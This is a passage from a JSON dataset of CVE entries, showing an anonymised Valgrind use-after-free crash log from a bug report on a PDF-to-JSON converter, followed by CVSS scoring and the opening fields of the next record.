PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E9: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG pure virtual method called terminate called without an active exception NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGABRT NUMBERTAG at NUMBERTAG raise APITAG NUMBERTAG by NUMBERTAG abort APITAG NUMBERTAG by NUMBERTAG EC NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG B5: ??? (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EC NUMBERTAG E: __cxa_pure_virtual (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG of which reachable via heuristic NUMBERTAG newarray NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Aborted ~~~ Thanks, Manh Dung",
  51502. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51503. "severity": "MEDIUM",
  51504. "baseScore": 5.5,
  51505. "impactScore": 3.6,
  51506. "exploitabilityScore": 1.8
  51507. },
  51508. {
  51509. "CVE_ID": "CVE-2020-19475",
  51510. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/36",
  51511. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/36",
  51512. "Repo_new": "flexpaper/pdf2json",
  51513. "Issue_Created_At": "2019-05-29T17:55:30Z",
